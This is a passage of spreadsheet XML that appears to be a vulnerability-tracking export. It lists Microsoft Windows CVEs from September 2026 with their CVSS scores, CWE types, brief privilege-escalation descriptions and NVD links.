s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P495" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q495" s="5" t="inlineStr" /><c r="R495" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S495" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T495" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69312</t></is></c></row><row r="496"><c r="A496" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B496" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C496" s="5" t="inlineStr"><is><t>CVE-2026-69323</t></is></c><c r="D496" s="5" t="n"><v>7.8</v></c><c r="E496" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F496" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G496" s="5" t="inlineStr" /><c r="H496" s="5" t="n"><v>0.003</v></c><c r="I496" s="5" t="inlineStr" /><c r="J496" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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6" s="5" t="inlineStr" /><c r="M496" s="5" t="inlineStr" /><c r="N496" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O496" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P496" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q496" s="5" t="inlineStr" /><c r="R496" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S496" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T496" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69323</t></is></c></row><row r="497"><c r="A497" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B497" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C497" s="5" t="inlineStr"><is><t>CVE-2026-69324</t></is></c><c r="D497" s="5" t="n"><v>7.8</v></c><c r="E497" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F497" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G497" s="5" t="inlineStr" /><c r="H497" s="5" t="n"><v>0.003</v></c><c r="I497" s="5" t="inlineStr" /><c r="J497" s="5" t="inlineStr" /><c r="K497" s="5" t="inlineStr" /><c r="L497" s="5" t="inlineStr" /><c r="M497" s="5" t="inlineStr" /><c r="N497" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O497" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P497" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q497" s="5" t="inlineStr" /><c r="R497" s="5" t="inlineStr"><is><t>CWE-125, CWE-843</t></is></c><c r="S497" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows Performance Monitor allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T497" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69324</t></is></c></row><row r="498"><c r="A498" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B498" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C498" s="5" t="inlineStr"><is><t>CVE-2026-69328</t></is></c><c r="D498" s="5" t="n"><v>7.8</v></c><c r="E498" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F498" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G498" s="5" t="inlineStr" /><c r="H498" s="5" t="n"><v>0.003</v></c><c r="I498" s="5" t="inlineStr" /><c r="J498" s="5" t="inlineStr" /><c r="K498" s="5" t="inlineStr" /><c r="L498" s="5" t="inlineStr" /><c r="M498" s="5" t="inlineStr" /><c r="N498" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O498" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P498" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q498" s="5" t="inlineStr" /><c r="R498" s="5" t="inlineStr"><is><t>CWE-426</t></is></c><c r="S498" s="5" t="inlineStr"><is><t>Untrusted search path in Windows Storage allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T498" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69328</t></is></c></row><row r="499"><c r="A499" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B499" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C499" s="5" t="inlineStr"><is><t>CVE-2026-69348</t></is></c><c r="D499" s="5" t="n"><v>7.8</v></c><c r="E499" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F499" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G499" s="5" t="inlineStr" /><c r="H499" s="5" t="n"><v>0.003</v></c><c r="I499" s="5" t="inlineStr" /><c r="J499" s="5" t="inlineStr" /><c r="K499" s="5" t="inlineStr" /><c r="L499" s="5" t="inlineStr" /><c r="M499" s="5" t="inlineStr" /><c r="N499" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O499" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P499" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q499" s="5" t="inlineStr" /><c r="R499" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S499" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T499" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69348</t></is></c></row><row r="500"><c r="A500" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B500" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C500" s="5" t="inlineStr"><is><t>CVE-2026-69352</t></is></c><c r="D500" s="5" t="n"><v>7.8</v></c><c r="E500" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F500" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G500" s="5" t="inlineStr" /><c r="H500" s="5" t="n"><v>0.003</v></c><c r="I500" s="5" t="inlineStr" /><c r="J500" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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00" s="5" t="inlineStr" /><c r="M500" s="5" t="inlineStr" /><c r="N500" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O500" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P500" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q500" s="5" t="inlineStr" /><c r="R500" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S500" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T500" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69352</t></is></c></row><row r="501"><c r="A501" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B501" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C501" s="5" t="inlineStr"><is><t>CVE-2026-69359</t></is></c><c r="D501" s="5" t="n"><v>7.8</v></c><c r="E501" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F501" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G501" s="5" t="inlineStr" /><c r="H501" s="5" t="n"><v>0.003</v></c><c r="I501" s="5" t="inlineStr" /><c r="J501" s="5" t="inlineStr" /><c r="K501" s="5" t="inlineStr" /><c r="L501" s="5" t="inlineStr" /><c r="M501" s="5" t="inlineStr" /><c r="N501" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O501" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P501" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q501" s="5" t="inlineStr" /><c r="R501" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S501" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Active Directory Domain Services allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T501" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69359</t></is></c></row><row r="502"><c r="A502" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B502" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C502" s="5" t="inlineStr"><is><t>CVE-2026-69368</t></is></c><c r="D502" s="5" t="n"><v>7.8</v></c><c r="E502" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F502" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G502" s="5" t="inlineStr" /><c r="H502" s="5" t="n"><v>0.002</v></c><c r="I502" s="5" t="inlineStr" /><c r="J502" s="5" t="inlineStr" /><c r="K502" s="5" t="inlineStr" /><c r="L502" s="5" t="inlineStr" /><c r="M502" s="5" t="inlineStr" /><c r="N502" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O502" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P502" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q502" s="5" t="inlineStr" /><c r="R502" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S502" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Overlay Filter allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T502" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69368</t></is></c></row><row r="503"><c r="A503" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B503" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C503" s="5" t="inlineStr"><is><t>CVE-2026-69377</t></is></c><c r="D503" s="5" t="n"><v>7.8</v></c><c r="E503" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F503" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G503" s="5" t="inlineStr" /><c r="H503" s="5" t="n"><v>0.003</v></c><c r="I503" s="5" t="inlineStr" /><c r="J503" s="5" t="inlineStr" /><c r="K503" s="5" t="inlineStr" /><c r="L503" s="5" t="inlineStr" /><c r="M503" s="5" t="inlineStr" /><c r="N503" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O503" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P503" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q503" s="5" t="inlineStr" /><c r="R503" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S503" s="5" t="inlineStr"><is><t>Missing authorization in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T503" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69377</t></is></c></row><row r="504"><c r="A504" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B504" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C504" s="5" t="inlineStr"><is><t>CVE-2026-69389</t></is></c><c r="D504" s="5" t="n"><v>7.8</v></c><c r="E504" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F504" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G504" s="5" t="inlineStr" /><c r="H504" s="5" t="n"><v>0.003</v></c><c r="I504" s="5" t="inlineStr" /><c r="J504" s="5" t="inlineStr" /><c r="K504" s="5" t="inlineStr" /><c r="L504" s="5" t="inlineStr" /><c r="M504" s="5" t="inlineStr" /><c r="N504" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O504" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P504" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q504" s="5" t="inlineStr" /><c r="R504" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S504" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Storage Management Provider allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T504" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69389</t></is></c></row><row r="505"><c r="A505" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B505" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C505" s="5" t="inlineStr"><is><t>CVE-2026-69391</t></is></c><c r="D505" s="5" t="n"><v>7.8</v></c><c r="E505" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F505" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G505" s="5" t="inlineStr" /><c r="H505" s="5" t="n"><v>0.003</v></c><c r="I505" s="5" t="inlineStr" /><c r="J505" s="5" t="inlineStr" /><c r="K505" s="5" t="inlineStr" /><c r="L505" s="5" t="inlineStr" /><c r="M505" s="5" t="inlineStr" /><c r="N505" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O505" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P505" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q505" s="5" t="inlineStr" /><c r="R505" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S505" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Broker Infrastructure Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T505" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69391</t></is></c></row><row r="506"><c r="A506" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B506" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C506" s="5" t="inlineStr"><is><t>CVE-2026-69392</t></is></c><c r="D506" s="5" t="n"><v>7.8</v></c><c r="E506" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F506" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G506" s="5" t="inlineStr" /><c r="H506" s="5" t="n"><v>0.003</v></c><c r="I506" s="5" t="inlineStr" /><c r="J506" s="5" t="inlineStr" /><c r="K506" s="5" t="inlineStr" /><c r="L506" s="5" t="inlineStr" /><c r="M506" s="5" t="inlineStr" /><c r="N506" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O506" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P506" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q506" s="5" t="inlineStr" /><c r="R506" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S506" s="5" t="inlineStr"><is><t>Use after free in Windows Shell allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T506" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69392</t></is></c></row><row r="507"><c r="A507" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B507" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C507" s="5" t="inlineStr"><is><t>CVE-2026-69407</t></is></c><c r="D507" s="5" t="n"><v>7.8</v></c><c r="E507" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F507" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G507" s="5" t="inlineStr" /><c r="H507" s="5" t="n"><v>0.003</v></c><c r="I507" s="5" t="inlineStr" /><c r="J507" s="5" t="inlineStr" /><c r="K507" s="5" t="inlineStr" /><c r="L507" s="5" t="inlineStr" /><c r="M507" s="5" t="inlineStr" /><c r="N507" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O507" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P507" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q507" s="5" t="inlineStr" /><c r="R507" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S507" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Volume Manager Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T507" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69407</t></is></c></row><row r="508"><c r="A508" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B508" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C508" s="5" t="inlineStr"><is><t>CVE-2026-69420</t></is></c><c r="D508" s="5" t="n"><v>7.8</v></c><c r="E508" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F508" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G508" s="5" t="inlineStr" /><c r="H508" s="5" t="n"><v>0.003</v></c><c r="I508" s="5" t="inlineStr" /><c r="J508" s="5" t="inlineStr" /><c r="K508" s="5" t="inlineStr" /><c r="L508" s="5" t="inlineStr" /><c r="M508" s="5" t="inlineStr" /><c r="N508" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O508" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P508" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q508" s="5" t="inlineStr" /><c r="R508" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S508" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows VOLSNAP.SYS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T508" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69420</t></is></c></row><row r="509"><c r="A509" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B509" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C509" s="5" t="inlineStr"><is><t>CVE-2026-69421</t></is></c><c r="D509" s="5" t="n"><v>7.8</v></c><c r="E509" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F509" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G509" s="5" t="inlineStr" /><c r="H509" s="5" t="n"><v>0.003</v></c><c r="I509" s="5" t="inlineStr" /><c r="J509" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K50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09" s="5" t="inlineStr" /><c r="M509" s="5" t="inlineStr" /><c r="N509" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O509" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P509" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q509" s="5" t="inlineStr" /><c r="R509" s="5" t="inlineStr"><is><t>CWE-122, CWE-191</t></is></c><c r="S509" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Windows Kernel Mode Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T509" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69421</t></is></c></row><row r="510"><c r="A510" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B510" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C510" s="5" t="inlineStr"><is><t>CVE-2026-69424</t></is></c><c r="D510" s="5" t="n"><v>7.8</v></c><c r="E510" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F510" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G510" s="5" t="inlineStr" /><c r="H510" s="5" t="n"><v>0.003</v></c><c r="I510" s="5" t="inlineStr" /><c r="J510" s="5" t="inlineStr" /><c r="K510" s="5" t="inlineStr" /><c r="L510" s="5" t="inlineStr" /><c r="M510" s="5" t="inlineStr" /><c r="N510" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O510" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P510" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q510" s="5" t="inlineStr" /><c r="R510" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S510" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Distributed File System (DFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T510" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69424</t></is></c></row><row r="511"><c r="A511" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B511" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C511" s="5" t="inlineStr"><is><t>CVE-2026-69426</t></is></c><c r="D511" s="5" t="n"><v>7.8</v></c><c r="E511" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F511" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G511" s="5" t="inlineStr" /><c r="H511" s="5" t="n"><v>0.003</v></c><c r="I511" s="5" t="inlineStr" /><c r="J511" s="5" t="inlineStr" /><c r="K511" s="5" t="inlineStr" /><c r="L511" s="5" t="inlineStr" /><c r="M511" s="5" t="inlineStr" /><c r="N511" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O511" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P511" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q511" s="5" t="inlineStr" /><c r="R511" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S511" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows VOLSNAP.SYS allows an authorized attacker to execute code locally.</t></is></c><c r="T511" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69426</t></is></c></row><row r="512"><c r="A512" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B512" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C512" s="5" t="inlineStr"><is><t>CVE-2026-69432</t></is></c><c r="D512" s="5" t="n"><v>7.8</v></c><c r="E512" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F512" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G512" s="5" t="inlineStr" /><c r="H512" s="5" t="n"><v>0.003</v></c><c r="I512" s="5" t="inlineStr" /><c r="J512" s="5" t="inlineStr" /><c r="K512" s="5" t="inlineStr" /><c r="L512" s="5" t="inlineStr" /><c r="M512" s="5" t="inlineStr" /><c r="N512" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O512" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P512" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q512" s="5" t="inlineStr" /><c r="R512" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S512" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Volume Manager Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T512" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69432</t></is></c></row><row r="513"><c r="A513" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B513" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C513" s="5" t="inlineStr"><is><t>CVE-2026-69433</t></is></c><c r="D513" s="5" t="n"><v>7.8</v></c><c r="E513" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F513" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G513" s="5" t="inlineStr" /><c r="H513" s="5" t="n"><v>0.003</v></c><c r="I513" s="5" t="inlineStr" /><c r="J513" s="5" t="inlineStr" /><c r="K513" s="5" t="inlineStr" /><c r="L513" s="5" t="inlineStr" /><c r="M513" s="5" t="inlineStr" /><c r="N513" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O513" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P513" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q513" s="5" t="inlineStr" /><c r="R513" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S513" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T513" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69433</t></is></c></row><row r="514"><c r="A514" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B514" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C514" s="5" t="inlineStr"><is><t>CVE-2026-69436</t></is></c><c r="D514" s="5" t="n"><v>7.8</v></c><c r="E514" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F514" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G514" s="5" t="inlineStr" /><c r="H514" s="5" t="n"><v>0.003</v></c><c r="I514" s="5" t="inlineStr" /><c r="J514" s="5" t="inlineStr" /><c r="K514" s="5" t="inlineStr" /><c r="L514" s="5" t="inlineStr" /><c r="M514" s="5" t="inlineStr" /><c r="N514" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O514" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P514" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q514" s="5" t="inlineStr" /><c r="R514" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S514" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T514" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69436</t></is></c></row><row r="515"><c r="A515" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B515" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C515" s="5" t="inlineStr"><is><t>CVE-2026-69444</t></is></c><c r="D515" s="5" t="n"><v>7.8</v></c><c r="E515" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F515" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G515" s="5" t="inlineStr" /><c r="H515" s="5" t="n"><v>0.003</v></c><c r="I515" s="5" t="inlineStr" /><c r="J515" s="5" t="inlineStr" /><c r="K515" s="5" t="inlineStr" /><c r="L515" s="5" t="inlineStr" /><c r="M515" s="5" t="inlineStr" /><c r="N515" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O515" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P515" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q515" s="5" t="inlineStr" /><c r="R515" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S515" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Speech allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T515" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69444</t></is></c></row><row r="516"><c r="A516" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B516" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C516" s="5" t="inlineStr"><is><t>CVE-2026-69445</t></is></c><c r="D516" s="5" t="n"><v>7.8</v></c><c r="E516" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F516" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G516" s="5" t="inlineStr" /><c r="H516" s="5" t="n"><v>0.004</v></c><c r="I516" s="5" t="inlineStr" /><c r="J516" s="5" t="inlineStr" /><c r="K516" s="5" t="inlineStr" /><c r="L516" s="5" t="inlineStr" /><c r="M516" s="5" t="inlineStr" /><c r="N516" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O516" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P516" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q516" s="5" t="inlineStr" /><c r="R516" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S516" s="5" t="inlineStr"><is><t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows Compressed Folder allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T516" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69445</t></is></c></row><row r="517"><c r="A517" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B517" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C517" s="5" t="inlineStr"><is><t>CVE-2026-69447</t></is></c><c r="D517" s="5" t="n"><v>7.8</v></c><c r="E517" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F517" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G517" s="5" t="inlineStr" /><c r="H517" s="5" t="n"><v>0.003</v></c><c r="I517" s="5" t="inlineStr" /><c r="J517" s="5" t="inlineStr" /><c r="K517" s="5" t="inlineStr" /><c r="L517" s="5" t="inlineStr" /><c r="M517" s="5" t="inlineStr" /><c r="N517" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O517" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P517" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q517" s="5" t="inlineStr" /><c r="R517" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S517" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T517" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69447</t></is></c></row><row r="518"><c r="A518" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B518" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C518" s="5" t="inlineStr"><is><t>CVE-2026-69450</t></is></c><c r="D518" s="5" t="n"><v>7.8</v></c><c r="E518" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F518" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G518" s="5" t="inlineStr" /><c r="H518" s="5" t="n"><v>0.003</v></c><c r="I518" s="5" t="inlineStr" /><c r="J518" s="5" t="inlineStr" /><c r="K518" s="5" t="inlineStr" /><c r="L518" s="5" t="inlineStr" /><c r="M518" s="5" t="inlineStr" /><c r="N518" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O518" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P518" s="5" 